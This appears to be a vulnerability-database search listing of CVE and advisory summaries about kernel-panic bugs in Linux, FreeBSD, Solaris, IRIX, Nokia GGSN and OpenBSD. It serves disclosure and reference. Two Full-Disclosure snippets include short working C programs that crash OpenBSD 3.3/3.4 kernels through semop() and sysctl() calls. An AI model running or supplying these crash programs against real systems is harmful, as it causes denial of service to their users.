9976 matches found
CVE-2004-0394
A "potential" buffer overflow exists in the panic() function in Linux 2.4.x, although it may not be exploitable due to the functionality of panic...
CVE-2004-0370
The setsockopt call in the KAME Project IPv6 implementation, as used in FreeBSD 5.2, does not properly handle certain IPv6 socket options, which could allow attackers to read kernel memory and cause a system panic...
CVE-2004-1355
Unknown vulnerability in the TCP/IP stack for Sun Solaris 8 and 9 allows local users to cause a denial of service (system panic) via unknown vectors...
CVE-2004-0370
The CVE-2004-0370 issue affects FreeBSD 5.2 using the KAME IPv6 stack, where a programming error in setsockopt(2) handling of IPv6 socket options can allow a local attacker to read portions of kernel memory and cause a system panic. The vulnerability arises from improper validation in setsockopt(...
FreeBSD Security Advisory FreeBSD-SA-04:06.ipv6
FreeBSD-SA-04:06.ipv6 Security Advisory, The FreeBSD Project. Topic: setsockopt(2) IPv6 sockets input validation error. Category: core. Module: kernel. Announced: 2004-03-29. Credit...
setsockopt(2) IPv6 sockets input validation error
From the FreeBSD Security Advisory: A programming error in the handling of some IPv6 socket options within the setsockopt(2) system call may result in memory locations being accessed without proper validation. It may be possible for a local attacker to read portions of kernel memory, resulting in...
CVE-2003-0368
Nokia Gateway GPRS support node (GGSN) allows remote attackers to cause a denial of service (kernel panic) via a malformed IP packet with a 0xFF TCP option...
CVE-2003-0175
SGI IRIX before 6.5.21 allows local users to cause a denial of service (kernel panic) via a certain call to the PIOCSWATCH ioctl...
CVE-2003-0368
CVE-2003-0368 affects the Nokia Gateway GPRS Support Node (GGSN, IP650-based). The issue allows a remote attacker to trigger a kernel panic/DoS by sending a malformed IP packet containing a TCP option 0xFF. Impact is a restart of the GGSN and disruption of connectivity. Mitigation provided by Nok...
CVE-2003-0175
CVE-2003-0175 affects SGI IRIX prior to 6.5.21 via the PIOCSWATCH ioctl: a local attacker can crash the kernel (DoS). CERT/CC and NVD confirm this is a local-denial condition caused by invoking PIOCSWATCH in user space. Vendor guidance (SGI advisory 20030603-01-P) recommends upgrading to IRIX 6.5...
[Full-Disclosure] yet another panic() in OpenBSD
a project lacking the basic QA and unit testing and here is the outcome:

#include <stdio.h>
#include <sys/types.h>
#include <sys/sem.h>
#include <sys/ipc.h>

int main()
{
    int i;
    for (i = 0; i < 0x40; i++)
        semop(i, (struct sembuf *) NULL, 0);
}

PANIC in OpenBSD 3.3 and 3.4 is confirmed. Full-Disclosure - We believe in it...
CVE-2003-0955
OpenBSD kernel 3.3 and 3.4 allows local users to cause a denial of service (kernel panic) and possibly execute arbitrary code in 3.4 via a program with an invalid header that is not properly handled by (1) ibcs2_exec.c in the iBCS2 emulation (compat_ibcs2) or (2) exec_elf.c, which leads to a stack-based...
OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing
OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing // source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before...
OpenBSD 3.3/3.4 - semctl/semop Local Unexpected Array Indexing
// source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before handling a user-supplied semaphore set. It is said that this coul...
[Full-Disclosure] OpenBSD kernel panic, yet still O*BSD much worse than MS-DoS 6.0
ppl think "hey, local DoS sucks", therefore they are. i think "hey, obsd sucks", therefore i am.

#include <stdio.h>
#include <sys/param.h>
#include <sys/sysctl.h>

int main()
{
    unsigned int blah[2] = { CTL_KERN, 0 }, addr = -4096 + 1;
    return sysctl(blah, 2, (void *) addr, &blah[1], 0, 0);
}

it's wide, it's opened, it's surel...
OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service
// source: https://www.securityfocus.com/bid/9073/info A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. Invoking sysctl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This cou...
OpenBSD kernel holes ...
once again i am honored to present you a generic and robust way to own OpenBSD 2.x-3.x, enjoy ; it is quite funny to name ring 0 overflow patches as "reliability fixes". who does theo think he is fooling ? kiddies in his cult ? you can patch your useless/old openbsd systems by visiting;...